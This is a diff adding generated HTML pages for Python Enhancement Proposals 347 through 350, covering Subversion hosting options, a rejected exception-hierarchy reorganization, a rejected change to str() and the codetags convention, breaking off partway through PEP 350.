    • Greg Stein suggested http://www.wush.net/subversion.php. They +offer 5 GB for $90/month, with 200 GB download/month. +The data is on a RAID drive and fully backed up. Anonymous +access and email commit notifications are supported. wush.net +elaborated the following details:
        +
      • The machine would be a Virtuozzo Virtual Private Server (VPS), +hosted at PowerVPS.
      • +
      • The default repository URL would be http://python.wush.net/svn/projectname/, +but anything else could be arranged
      • +
      • we would get SSH login to the machine, with sudo capabilities.
      • +
      • They have a Web interface for management of the various SVN +repositories that we want to host, and to manage user accounts. +While svn+ssh would be supported, the user interface does not +yet support it.
      • +
      • For offsite mirroring/backup, they suggest to use rsync +instead of download of repository tarballs.
      • +
      +

      Bob Ippolito reported that they had used wush.net for a +commercial project for about 6 months, after which time they +left wush.net, because the service was down for three days, +with nobody reachable, and no explanation when it came back.

      +
    • +
    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0347.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0348/index.html b/pep-0348/index.html new file mode 100644 index 00000000000..defd347e646 --- /dev/null +++ b/pep-0348/index.html @@ -0,0 +1,646 @@ + + + + + + + + PEP 348 – Exception Reorganization for Python 3.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 348 – Exception Reorganization for Python 3.0

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
28-Jul-2005
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been rejected [16].

+
+
+

Abstract

+

Python, as of version 2.4, has 38 exceptions (including warnings) in +the built-in namespace in a rather shallow hierarchy. These +classes have come about over the years without a chance to learn from +experience. This PEP proposes doing a reorganization of the hierarchy +for Python 3.0 when backwards-compatibility is not as much of an +issue.

+

Along with this reorganization, adding a requirement that all +objects passed to a raise statement must inherit from a specific +superclass is proposed. This is to have guarantees about the basic +interface of exceptions and to further enhance the natural hierarchy +of exceptions.

+

Lastly, bare except clauses will be changed to be semantically +equivalent to except Exception. Most people currently use bare +except clause for this purpose and with the exception hierarchy +reorganization becomes a viable default.

+
+
+

Rationale For Wanting Change

+

Exceptions are a critical part of Python. While exceptions are +traditionally used to signal errors in a program, they have also grown +to be used for flow control for things such as iterators.

+

While their importance is great, there is a lack of structure to them. +This stems from the fact that any object can be raised as an +exception. Because of this you have no guarantee in terms of what +kind of object will be raised, destroying any possible hierarchy +raised objects might adhere to.

+

But exceptions do have a hierarchy, showing the severity of the +exception. The hierarchy also groups related exceptions together to +simplify catching them in except clauses. To allow people to +be able to rely on this hierarchy, a common superclass that all +raise objects must inherit from is being proposed. It also allows +guarantees about the interface to raised objects to be made (see +PEP 344). A discussion about all of this has occurred +before on python-dev [1].

+

As bare except clauses stand now, they catch all exceptions. +While this can be handy, it is rather overreaching for the common +case. Thanks to having a required superclass, catching all +exceptions is as easy as catching just one specific exception. +This allows bare except clauses to be used for a more useful +purpose. +Once again, this has been discussed on python-dev [2].

+

Finally, slight changes to the exception hierarchy will make it much +more reasonable in terms of structure. By minor rearranging +exceptions +that should not typically be caught can be allowed to propagate to the +top of the execution stack, terminating the interpreter as intended.

+
+
+

Philosophy of Reorganization

+

For the reorganization of the hierarchy, there was a general +philosophy followed that developed from discussion of earlier drafts +of this PEP [4], [5], +[6], [7], +[8], [9]. +First and foremost was to not break anything +that works. This meant that renaming exceptions was out of the +question unless the name was deemed severely bad. This +also meant no removal of exceptions unless they were viewed as +truly misplaced. The introduction of new exceptions were only done in +situations where there might be a use for catching a superclass of a +category of exceptions. Lastly, existing exceptions would have their +inheritance tree changed only if it was felt they were truly +misplaced to begin with.

+

For all new exceptions, the proper suffix had to be chosen. For +those that signal an error, “Error” is to be used. If the exception +is a warning, then “Warning”. “Exception” is to be used when none +of the other suffixes are proper to use and no specific suffix is +a better fit.

+

After that it came down to choosing which exceptions should and +should not inherit from Exception. This was for the purpose of +making bare except clauses more useful.

+

Lastly, the entire existing hierarchy had to inherit from the new +exception meant to act as the required superclass for all exceptions +to inherit from.

+
+
+

New Hierarchy

+
+

Note

+

Exceptions flagged with “stricter inheritance” will no +longer inherit from a certain class. A “broader inheritance” flag +means a class has been added to the exception’s inheritance tree. +All comparisons are against the Python 2.4 exception hierarchy.

+
+
+-- BaseException (new; broader inheritance for subclasses)
+    +-- Exception
+        +-- GeneratorExit (defined in PEP 342)
+        +-- StandardError
+            +-- ArithmeticError
+                +-- DivideByZeroError
+                +-- FloatingPointError
+                +-- OverflowError
+            +-- AssertionError
+            +-- AttributeError
+            +-- EnvironmentError
+                +-- IOError
+                +-- EOFError
+                +-- OSError
+            +-- ImportError
+            +-- LookupError
+                +-- IndexError
+                +-- KeyError
+            +-- MemoryError
+            +-- NameError
+                +-- UnboundLocalError
+            +-- NotImplementedError (stricter inheritance)
+            +-- SyntaxError
+                +-- IndentationError
+                    +-- TabError
+            +-- TypeError
+            +-- RuntimeError
+            +-- UnicodeError
+                +-- UnicodeDecodeError
+                +-- UnicodeEncodeError
+                +-- UnicodeTranslateError
+            +-- ValueError
+            +-- ReferenceError
+        +-- StopIteration
+        +-- SystemError
+        +-- Warning
+            +-- DeprecationWarning
+            +-- FutureWarning
+            +-- PendingDeprecationWarning
+            +-- RuntimeWarning
+            +-- SyntaxWarning
+            +-- UserWarning
+        + -- WindowsError
+    +-- KeyboardInterrupt (stricter inheritance)
+    +-- SystemExit (stricter inheritance)
+
+
+

Differences Compared to Python 2.4

+

A more thorough explanation of terms is needed when discussing +inheritance changes. Inheritance changes result in either broader or +more restrictive inheritance. “Broader” is when a class has an +inheritance tree like cls, A and then becomes cls, B, A. +“Stricter” is the reverse.

+
+

BaseException

+

The superclass that all exceptions must inherit from. It’s name was +chosen to reflect that it is at the base of the exception hierarchy +while being an exception itself. “Raisable” was considered as a name, +it was passed on because its name did not properly reflect the fact +that it is an exception itself.

+

Direct inheritance of BaseException is not expected, and will +be discouraged for the general case. Most user-defined +exceptions should inherit from Exception instead. This allows +catching Exception to continue to work in the common case of catching +all exceptions that should be caught. Direct inheritance of +BaseException should only be done in cases where an entirely new +category of exception is desired.

+

But, for cases where all +exceptions should be caught blindly, except BaseException will +work.

+
+
+

KeyboardInterrupt and SystemExit

+

Both exceptions are no longer under Exception. This is to allow bare +except clauses to act as a more viable default case by catching +exceptions that inherit from Exception. With both KeyboardInterrupt +and SystemExit acting as signals that the interpreter is expected to +exit, catching them in the common case is the wrong semantics.

+
+
+

NotImplementedError

+

Inherits from Exception instead of from RuntimeError.

+

Originally inheriting from RuntimeError, NotImplementedError does not +have any direct relation to the exception meant for use in user code +as a quick-and-dirty exception. Thus it now directly inherits from +Exception.

+
+
+
+

Required Superclass for raise

+

By requiring all objects passed to a raise statement to inherit +from a specific superclass, all exceptions are guaranteed to have +certain attributes. If PEP 344 is accepted, the attributes +outlined there will be guaranteed to be on all exceptions raised. +This should help facilitate debugging by making the querying of +information from exceptions much easier.

+

The proposed hierarchy has BaseException as the required base class.

+
+

Implementation

+

Enforcement is straightforward. Modifying RAISE_VARARGS to do an +inheritance check first before raising an exception should be enough. +For the C API, all functions that set an exception will have the same +inheritance check applied.

+
+
+
+

Bare except Clauses Catch Exception

+

In most existing Python 2.4 code, bare except clauses are too +broad in the exceptions they catch. Typically only exceptions that +signal an error are desired to be caught. This means that exceptions +that are used to signify that the interpreter should exit should not +be caught in the common case.

+

With KeyboardInterrupt and SystemExit moved to inherit from +BaseException instead of Exception, changing bare except clauses +to act as except Exception becomes a much more reasonable +default. This change also will break very little code since these +semantics are what most people want for bare except clauses.

+

The complete removal of bare except clauses has been argued for. +The case has been made that they violate both Only One Way To Do It +(OOWTDI) and Explicit Is Better Than Implicit (EIBTI) as listed in the +Zen of Python. But Practicality Beats Purity (PBP), also in +the Zen of Python, trumps both of these in this case. The BDFL has +stated that bare except clauses will work this way +[14].

+
+

Implementation

+

The compiler will emit the bytecode for except Exception whenever +a bare except clause is reached.

+
+
+
+

Transition Plan

+

Because of the complexity and clutter that would be required to add +all features planned in this PEP, the transition plan is very simple. +In Python 2.5 BaseException is added. In Python 3.0, all remaining +features (required superclass, change in inheritance, bare except +clauses becoming the same as except Exception) will go into +affect. In order to make all of this work in a backwards-compatible +way in Python 2.5 would require very deep hacks in the exception +machinery which could be error-prone and lead to a slowdown in +performance for little benefit.

+

To help with the transition, the documentation will be changed to +reflect several programming guidelines:

+
    +
  • When one wants to catch all exceptions, catch BaseException
  • +
  • To catch all exceptions that do not represent the termination of +the interpreter, catch Exception explicitly
  • +
  • Explicitly catch KeyboardInterrupt and SystemExit; don’t rely on +inheritance from Exception to lead to the capture
  • +
  • Always catch NotImplementedError explicitly instead of relying on +the inheritance from RuntimeError
  • +
+

The documentation for the ‘exceptions’ module [3], +tutorial [15], and PEP 290 will all require +updating.

+
+
+

Rejected Ideas

+
+

DeprecationWarning Inheriting From PendingDeprecationWarning

+

This was originally proposed because a DeprecationWarning can be +viewed as a PendingDeprecationWarning that is being removed in the +next version. But since enough people thought the inheritance could +logically work the other way around, the idea was dropped.

+
+
+

AttributeError Inheriting From TypeError or NameError

+

Viewing attributes as part of the interface of a type caused the idea +of inheriting from TypeError. But that partially defeats the thinking +of duck typing and thus the idea was dropped.

+

Inheriting from NameError was suggested because objects can be viewed +as having their own namespace where the attributes live and when an +attribute is not found it is a namespace failure. This was also +dropped as a possibility since not everyone shared this view.

+
+
+

Removal of EnvironmentError

+

Originally proposed based on the idea that EnvironmentError was an +unneeded distinction, the BDFL overruled this idea [10].

+
+
+

Introduction of MacError and UnixError

+

Proposed to add symmetry to WindowsError, the BDFL said they won’t be +used enough [10]. The idea of then removing WindowsError +was proposed and accepted as reasonable, thus completely negating the +idea of adding these exceptions.

+
+
+

SystemError Subclassing SystemExit

+

Proposed because a SystemError is meant to lead to a system exit, the +idea was removed since CriticalError indicates this better.

+
+
+

ControlFlowException Under Exception

+

It has been suggested that ControlFlowException should inherit from +Exception. This idea has been rejected based on the thinking that +control flow exceptions typically do not all need to be caught by a +single except clause.

+
+
+

Rename NameError to NamespaceError

+

NameError is considered more succinct and leaves open no possible +mistyping of +the capitalization of “Namespace” [11].

+
+

Renaming RuntimeError or Introducing SimpleError

+

The thinking was that RuntimeError was in no way an obvious name for +an exception meant to be used when a situation did not call for the +creation of a new exception. The renaming was rejected on the basis +that the exception is already used throughout the interpreter +[12]. +Rejection of SimpleError was founded on the thought that people +should be free to use whatever exception they choose and not have one +so blatantly suggested [13].

+
+
+
+

Renaming Existing Exceptions

+

Various renamings were suggested but non garnered more than a +0 vote +(renaming ReferenceError to WeakReferenceError). The thinking was +that the existing names were fine and no one had actively complained +about them ever. To minimize backwards-compatibility issues and +causing existing Python programmers extra pain, the renamings were +removed.

+
+
+

Have EOFError Subclass IOError

+

The original thought was that since EOFError deals directly with I/O, +it should +subclass IOError. But since EOFError is used more as a signal that an +event +has occurred (the exhaustion of an I/O port), it should not subclass +such a specific error exception.

+
+
+

Have MemoryError and SystemError Have a Common Superclass

+

Both classes deal with the interpreter, so why not have them have a +common +superclass? Because one of them means that the interpreter is in a +state that it should not recover from while the other does not.

+
+
+

Common Superclass for PendingDeprecationWarning and DeprecationWarning

+

Grouping the deprecation warning exceptions together makes intuitive +sense. +But this sensical idea does not extend well when one considers how +rarely either warning is used, let along at the same time.

+
+
+

Removing WindowsError

+

Originally proposed based on the idea that having such a +platform-specific exception should not be in the built-in namespace. +It turns out, though, enough code exists that uses the exception to +warrant it staying.

+
+
+

Superclass for KeyboardInterrupt and SystemExit

+

Proposed to make catching non-Exception inheriting exceptions easier +along with easing the transition to the new hierarchy, the idea was +rejected by the BDFL [14]. The argument that existing +code did not show enough instances of the pair of exceptions being +caught and thus did not justify cluttering the built-in namespace +was used.

+
+
+
+

Acknowledgements

+

Thanks to Robert Brewer, Josiah Carlson, Alyssa Coghlan, Timothy +Delaney, Jack Diedrich, Fred L. Drake, Jr., Philip J. Eby, Greg Ewing, +James Y. Knight, MA Lemburg, Guido van Rossum, Stephen J. Turnbull, +Raymond Hettinger, and everyone else I missed for participating in the +discussion.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0348.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0349/index.html b/pep-0349/index.html new file mode 100644 index 00000000000..33273486f0c --- /dev/null +++ b/pep-0349/index.html @@ -0,0 +1,254 @@ + + + + + + + + PEP 349 – Allow str() to return unicode strings | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 349 – Allow str() to return unicode strings

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
02-Aug-2005
+
Python-Version:
+
2.5
+
Post-History:
+
06-Aug-2005
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to change the str() built-in function so that it +can return unicode strings. This change would make it easier to +write code that works with either string type and would also make +some existing code handle unicode strings. The C function +PyObject_Str() would remain unchanged and the function +PyString_New() would be added instead.

+
+
+

Rationale

+

Python has had a Unicode string type for some time now but use of +it is not yet widespread. There is a large amount of Python code +that assumes that string data is represented as str instances. +The long-term plan for Python is to phase out the str type and use +unicode for all string data. Clearly, a smooth migration path +must be provided.

+

We need to upgrade existing libraries, written for str instances, +to be made capable of operating in an all-unicode string world. +We can’t change to an all-unicode world until all essential +libraries are made capable for it. Upgrading the libraries in one +shot does not seem feasible. A more realistic strategy is to +individually make the libraries capable of operating on unicode +strings while preserving their current all-str environment +behaviour.

+

First, we need to be able to write code that can accept unicode +instances without attempting to coerce them to str instances. Let +us label such code as Unicode-safe. Unicode-safe libraries can be +used in an all-unicode world.

+

Second, we need to be able to write code that, when provided only +str instances, will not create unicode results. Let us label such +code as str-stable. Libraries that are str-stable can be used by +libraries and applications that are not yet Unicode-safe.

+

Sometimes it is simple to write code that is both str-stable and +Unicode-safe. For example, the following function just works:

+
def appendx(s):
+    return s + 'x'
+
+
+

That’s not too surprising since the unicode type is designed to +make the task easier. The principle is that when str and unicode +instances meet, the result is a unicode instance. One notable +difficulty arises when code requires a string representation of an +object; an operation traditionally accomplished by using the str() +built-in function.

+

Using the current str() function makes the code not Unicode-safe. +Replacing a str() call with a unicode() call makes the code not +str-stable. Changing str() so that it could return unicode +instances would solve this problem. As a further benefit, some code +that is currently not Unicode-safe because it uses str() would +become Unicode-safe.

+
+
+

Specification

+

A Python implementation of the str() built-in follows:

+
def str(s):
+    """Return a nice string representation of the object.  The
+    return value is a str or unicode instance.
+    """
+    if type(s) is str or type(s) is unicode:
+        return s
+    r = s.__str__()
+    if not isinstance(r, (str, unicode)):
+        raise TypeError('__str__ returned non-string')
+    return r
+
+
+

The following function would be added to the C API and would be the +equivalent to the str() built-in (ideally it be called PyObject_Str, +but changing that function could cause a massive number of +compatibility problems):

+
PyObject *PyString_New(PyObject *);
+
+
+

A reference implementation is available on Sourceforge [1] as a +patch.

+
+
+

Backwards Compatibility

+

Some code may require that str() returns a str instance. In the +standard library, only one such case has been found so far. The +function email.header_decode() requires a str instance and the +email.Header.decode_header() function tries to ensure this by +calling str() on its argument. The code was fixed by changing +the line “header = str(header)” to:

+
if isinstance(header, unicode):
+    header = header.encode('ascii')
+
+
+

Whether this is truly a bug is questionable since decode_header() +really operates on byte strings, not character strings. Code that +passes it a unicode instance could itself be considered buggy.

+
+
+

Alternative Solutions

+

A new built-in function could be added instead of changing str(). +Doing so would introduce virtually no backwards compatibility +problems. However, since the compatibility problems are expected to +rare, changing str() seems preferable to adding a new built-in.

+

The basestring type could be changed to have the proposed behaviour, +rather than changing str(). However, that would be confusing +behaviour for an abstract base type.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0349.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0350/index.html b/pep-0350/index.html new file mode 100644 index 00000000000..265422541ab --- /dev/null +++ b/pep-0350/index.html @@ -0,0 +1,657 @@ + + + + + + + + PEP 350 – Codetags | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 350 – Codetags

+
+
Author:
+
Micah Elliott <mde at tracos.org>
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
27-Jun-2005
+
Post-History:
+
10-Aug-2005, 26-Sep-2005
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected. While the community may be interested, +there is no desire to make the standard library conform to this standard.

+
+
+

Abstract

+

This informational PEP aims to provide guidelines for consistent use +of codetags, which would enable the construction of standard +utilities to take advantage of the codetag information, as well as +making Python code more uniform across projects. Codetags also +represent a very lightweight programming micro-paradigm and become +useful for project management, documentation, change tracking, and +project health monitoring. This is submitted as a PEP because its +ideas are thought to be Pythonic, although the concepts are not unique +to Python programming. Herein are the definition of codetags, the +philosophy behind them, a motivation for standardized conventions, +some examples, a specification, a toolset description, and possible +objections to the Codetag project/paradigm.

+

This PEP is also living as a wiki for people to add comments.

+
+
+

What Are Codetags?

+

Programmers widely use ad-hoc code comment markup conventions to serve +as reminders of sections of code that need closer inspection or +review. Examples of markup include FIXME, TODO, XXX, +BUG, but there many more in wide use in existing software. Such +markup will henceforth be referred to as codetags. These codetags +may show up in application code, unit tests, scripts, general +documentation, or wherever suitable.

+

Codetags have been under discussion and in use (hundreds of codetags +in the Python 2.4 sources) in many places (e.g., c2) for many years. +See References for further historic and current information.

+
+
+

Philosophy

+

If you subscribe to most of these values, then codetags will likely be +useful for you.

+
    +
  1. As much information as possible should be contained inside the +source code (application code or unit tests). This along with +use of codetags impedes duplication. Most documentation can be +generated from that source code; e.g., by using help2man, man2html, +docutils, epydoc/pydoc, ctdoc, etc.
  2. +
  3. Information should be almost never duplicated – it should be +recorded in a single original format and all other locations should +be automatically generated from the original, or simply be +referenced. This is famously known as the Single Point Of +Truth (SPOT) or Don’t Repeat Yourself (DRY) rule.
  4. +
  5. Documentation that gets into customers’ hands should be +auto-generated from single sources into all other output +formats. People want documentation in many forms. It is thus +important to have a documentation system that can generate all of +these.
  6. +
  7. The developers are the documentation team. They write the code +and should know the code the best. There should not be a +dedicated, disjoint documentation team for any non-huge project.
  8. +
  9. Plain text (with non-invasive markup) is the best format for +writing anything. All other formats are to be generated from the +plain text.
  10. +
+

Codetag design was influenced by the following goals:

+
    +
  1. Comments should be short whenever possible.
  2. +
  3. Codetag fields should be optional and of minimal length. Default +values and custom fields can be set by individual code shops.
  4. +
  5. Codetags should be minimalistic. The quicker it is to jot +something down, the more likely it is to get jotted.
  6. +
  7. The most common use of codetags will only have zero to two fields +specified, and these should be the easiest to type and read.
  8. +
+
+
+

Motivation

+
    +
  • Various productivity tools can be built around codetags.

    See Tools.

    +
  • +
  • Encourages consistency.

    Historically, a subset of these codetags has been used informally in +the majority of source code in existence, whether in Python or in +other languages. Tags have been used in an inconsistent manner with +different spellings, semantics, format, and placement. For example, +some programmers might include datestamps and/or user identifiers, +limit to a single line or not, spell the codetag differently than +others, etc.

    +
  • +
  • Encourages adherence to SPOT/DRY principle.

    E.g., generating a roadmap dynamically from codetags instead of +keeping TODOs in sync with separate roadmap document.

    +
  • +
  • Easy to remember.

    All codetags must be concise, intuitive, and semantically +non-overlapping with others. The format must also be simple.

    +
  • +
  • Use not required/imposed.

    If you don’t use codetags already, there’s no obligation to start, +and no risk of affecting code (but see Objections). A small subset +can be adopted and the Tools will still be useful (a few codetags +have probably already been adopted on an ad-hoc basis anyway). Also +it is very easy to identify and remove (and possibly record) a +codetag that is no longer deemed useful.

    +
  • +
  • Gives a global view of code.

    Tools can be used to generate documentation and reports.

    +
  • +
  • A logical location for capturing CRCs/Stories/Requirements.

    The XP community often does not electronically capture Stories, but +codetags seem like a good place to locate them.

    +
  • +
  • Extremely lightweight process.

    Creating tickets in a tracking system for every thought degrades +development velocity. Even if a ticketing system is employed, +codetags are useful for simply containing links to those tickets.

    +
  • +
+
+
+

Examples

+

This shows a simple codetag as commonly found in sources everywhere +(with the addition of a trailing <>):

+
# FIXME: Seems like this loop should be finite. <>
+while True: ...
+
+
+

The following contrived example demonstrates a typical use of +codetags. It uses some of the available fields to specify the +assignees (a pair of programmers with initials MDE and CLE), the +Date of expected completion (Week 14), and the Priority of the item +(2):

+
# FIXME: Seems like this loop should be finite. <MDE,CLE d:14w p:2>
+while True: ...
+
+
+

This codetag shows a bug with fields describing author, discovery +(origination) date, due date, and priority:

+
# BUG: Crashes if run on Sundays.
+# <MDE 2005-09-04 d:14w p:2>
+if day == 'Sunday': ...
+
+
+

Here is a demonstration of how not to use codetags. This has many +problems: 1) Codetags cannot share a line with code; 2) Missing colon +after mnemonic; 3) A codetag referring to codetags is usually useless, +and worse, it is not completable; 4) No need to have a bunch of fields +for a trivial codetag; 5) Fields with unknown values (t:XXX) +should not be used:

+
i = i + 1   # TODO Add some more codetags.
+# <JRNewbie 2005-04-03 d:2005-09-03 t:XXX d:14w p:0 s:inprogress>
+
+
+
+
+

Specification

+

This describes the format: syntax, mnemonic names, fields, and +semantics, and also the separate DONE File.

+
+

General Syntax

+

Each codetag should be inside a comment, and can be any number of +lines. It should not share a line with code. It should match the +indentation of surrounding code. The end of the codetag is marked by +a pair of angle brackets <> containing optional fields, which must +not be split onto multiple lines. It is preferred to have a codetag +in # comments instead of string comments. There can be multiple +fields per codetag, all of which are optional.

+

In short, a codetag consists of a mnemonic, a colon, commentary text, +an opening angle bracket, an optional list of fields, and a closing +angle bracket. E.g.,

+
# MNEMONIC: Some (maybe multi-line) commentary. <field field ...>
+
+
+
+
+

Mnemonics

+

The codetags of interest are listed below, using the following format:

+
+
recommended mnemonic (& synonym list)
+
+
canonical name: semantics
+
+
+
+
TODO (MILESTONE, MLSTN, DONE, YAGNI, TBD, TOBEDONE)
To do: Informal tasks/features that are pending completion.
+
FIXME (XXX, DEBUG, BROKEN, REFACTOR, REFACT, RFCTR, OOPS, SMELL, NEEDSWORK, INSPECT)
Fix me: Areas of problematic or ugly code needing refactoring or +cleanup.
+
BUG (BUGFIX)
Bugs: Reported defects tracked in bug database.
+
NOBUG (NOFIX, WONTFIX, DONTFIX, NEVERFIX, UNFIXABLE, CANTFIX)
Will Not Be Fixed: Problems that are well-known but will never be +addressed due to design problems or domain limitations.
+
REQ (REQUIREMENT, STORY)
Requirements: Satisfactions of specific, formal requirements.
+
RFE (FEETCH, NYI, FR, FTRQ, FTR)
Requests For Enhancement: Roadmap items not yet implemented.
+
IDEA
Ideas: Possible RFE candidates, but less formal than RFE.
+
??? (QUESTION, QUEST, QSTN, WTF)
Questions: Misunderstood details.
+
!!! (ALERT)
Alerts: In need of immediate attention.
+
HACK (CLEVER, MAGIC)
Hacks: Temporary code to force inflexible functionality, or +simply a test change, or workaround a known problem.
+
PORT (PORTABILITY, WKRD)
Portability: Workarounds specific to OS, Python version, etc.
+
CAVEAT (CAV, CAVT, WARNING, CAUTION)
Caveats: Implementation details/gotchas that stand out as +non-intuitive.
+
NOTE (HELP)
Notes: Sections where a code reviewer found something that needs +discussion or further investigation.
+
FAQ
Frequently Asked Questions: Interesting areas that require +external explanation.
+
GLOSS (GLOSSARY)
Glossary: Definitions for project glossary.
+
SEE (REF, REFERENCE)
See: Pointers to other code, web link, etc.
+
TODOC (DOCDO, DODOC, NEEDSDOC, EXPLAIN, DOCUMENT)
Needs Documentation: Areas of code that still need to be +documented.
+
CRED (CREDIT, THANKS)
Credits: Accreditations for external provision of enlightenment.
+
STAT (STATUS)
Status: File-level statistical indicator of maturity of this +file.
+
RVD (REVIEWED, REVIEW)
Reviewed: File-level indicator that review was conducted.
+
+

File-level codetags might be better suited as properties in the +revision control system, but might still be appropriately specified in +a codetag.

+

Some of these are temporary (e.g., FIXME) while others are +persistent (e.g., REQ). A mnemonic was chosen over a synonym +using three criteria: descriptiveness, length (shorter is better), +commonly used.

+

Choosing between FIXME and XXX is difficult. XXX seems to +be more common, but much less descriptive. Furthermore, XXX is a +useful placeholder in a piece of code having a value that is unknown. +Thus FIXME is the preferred spelling. Sun says that XXX +and FIXME are slightly different, giving XXX higher severity. +However, with decades of chaos on this topic, and too many millions of +developers who won’t be influenced by Sun, it is easy to rightly call +them synonyms.

+

DONE is always a completed TODO item, but this should probably +be indicated through the revision control system and/or a completion +recording mechanism (see DONE File).

+

It may be a useful metric to count NOTE tags: a high count may +indicate a design (or other) problem. But of course the majority of +codetags indicate areas of code needing some attention.

+

An FAQ is probably more appropriately documented in a wiki where +users can more easily view and contribute.

+
+
+

Fields

+

All fields are optional. The proposed standard fields are described +in this section. Note that upper case field characters are intended +to be replaced.

+

The Originator/Assignee and Origination Date/Week fields are the +most common and don’t usually require a prefix.

+

This lengthy list of fields is liable to scare people (the intended +minimalists) away from adopting codetags, but keep in mind that these +only exist to support programmers who either 1) like to keep BUG +or RFE codetags in a complete form, or 2) are using codetags as +their complete and only tracking system. In other words, many of +these fields will be used very rarely. They are gathered largely from +industry-wide conventions, and example sources include GCC +Bugzilla and Python’s SourceForge tracking systems.

+
+
AAA[,BBB]...
List of Originator or Assignee initials (the context +determines which unless both should exist). It is also okay to +use usernames such as MicahE instead of initials. Initials +(in upper case) are the preferred form.
+
a:AAA[,BBB]...
List of Assignee initials. This is necessary only in (rare) +cases where a codetag has both an assignee and an originator, and +they are different. Otherwise the a: prefix is omitted, and +context determines the intent. E.g., FIXME usually has an +Assignee, and NOTE usually has an Originator, but if a +FIXME was originated (and initialed) by a reviewer, then the +assignee’s initials would need a a: prefix.
+
YYYY[-MM[-DD]] or WW[.D]w
The Origination Date indicating when the comment was added, in +ISO 8601 format (digits and hyphens only). Or Origination +Week, an alternative form for specifying an Origination Date. +A day of the week can be optionally specified. The w suffix +is necessary for distinguishing from a date.
+
d:YYYY[-MM[-DD]] or d:WW[.D]w
Due Date (d) target completion (estimate). Or Due Week (d), +an alternative to specifying a Due Date.
+
p:N
Priority (p) level. Range (N) is from 0..3 with 3 being the +highest. 0..3 are analogous to low, medium, high, and +showstopper/critical. The Severity field could be factored into +this single number, and doing so is recommended since having both +is subject to varying interpretation. The range and order should +be customizable. The existence of this field is important for any +tool that itemizes codetags. Thus a (customizable) default value +should be supported.
+
t:NNNN
Tracker (t) number corresponding to associated Ticket ID in +separate tracking system.
+
+

The following fields are also available but expected to be less +common.

+
+
c:AAAA
Category (c) indicating some specific area affected by this +item.
+
s:AAAA
Status (s) indicating state of item. Examples are “unexplored”, +“understood”, “inprogress”, “fixed”, “done”, “closed”. Note that +when an item is completed it is probably better to remove the +codetag and record it in a DONE File.
+
i:N
Development cycle Iteration (i). Useful for grouping codetags into +completion target groups.
+
r:N
Development cycle Release (r). Useful for grouping codetags into +completion target groups.
+
+

To summarize, the non-prefixed fields are initials and origination +date, and the prefixed fields are: assignee (a), due (d), priority +(p), tracker (t), category (c), status (s), iteration (i), and release +(r).

+

It should be possible for groups to define or add their own fields, +and these should have upper case prefixes to distinguish them from the +standard set. Examples of custom fields are Operating System (O), +Severity (S), Affected Version (A), Customer (C), etc.

+
+
+

DONE File

+

Some codetags have an ability to be completed (e.g., FIXME, +TODO, BUG). It is often important to retain completed items +by recording them with a completion date stamp. Such completed items +are best stored in a single location, global to a project (or maybe a +package). The proposed format is most easily described by an example, +say ~/src/fooproj/DONE:

+
# TODO: Recurse into subdirs only on blue
+# moons. <MDE 2003-09-26>
+[2005-09-26 Oops, I underestimated this one a bit.  Should have
+used Warsaw's First Law!]
+
+# FIXME: ...
+...
+
+
+

You can see that the codetag is copied verbatim from the original +source file. The date stamp is then entered on the following line +with an optional post-mortem commentary. The entry is terminated by a +blank line (\n\n).

+

It may sound burdensome to have to delete codetag lines every time one +gets completed. But in practice it is quite easy to setup a Vim or +Emacs mapping to auto-record a codetag deletion in this format (sans +the commentary).

+
+
+
+

Tools

+

Currently, programmers (and sometimes analysts) typically use grep +to generate a list of items corresponding to a single codetag. +However, various hypothetical productivity tools could take advantage +of a consistent codetag format. Some example tools follow.

+
+
Document Generator
Possible docs: glossary, roadmap, manpages
+
Codetag History
Track (with revision control system interface) when a BUG tag +(or any codetag) originated/resolved in a code section
+
Code Statistics
A project Health-O-Meter
+
Codetag Lint
Notify of invalid use of codetags, and aid in porting to codetags
+
Story Manager/Browser
An electronic means to replace XP notecards. In MVC terms, the +codetag is the Model, and the Story Manager could be a graphical +Viewer/Controller to do visual rearrangement, prioritization, and +assignment, milestone management.
+
Any Text Editor
Used for changing, removing, adding, rearranging, recording +codetags.
+
+

There are some tools already in existence that take advantage of a +smaller set of pseudo-codetags (see References). There is also an +example codetags implementation under way, known as the Codetag +Project.

+
+
+

Objections

+
+
Objection:
+
Extreme Programming argues that such codetags should not +ever exist in code since the code is the documentation.
+
Defense:
+
Maybe you should put the codetags in the unit test files +instead. Besides, it’s tough to generate documentation from +uncommented source code.
+
+
+
+
Objection:
+
Too much existing code has not followed proposed +guidelines.
+
Defense:
+
[Simple] utilities (ctlint) could convert existing codes.
+
+
+
+
Objection:
+
Causes duplication with tracking system.
+
Defense:
+
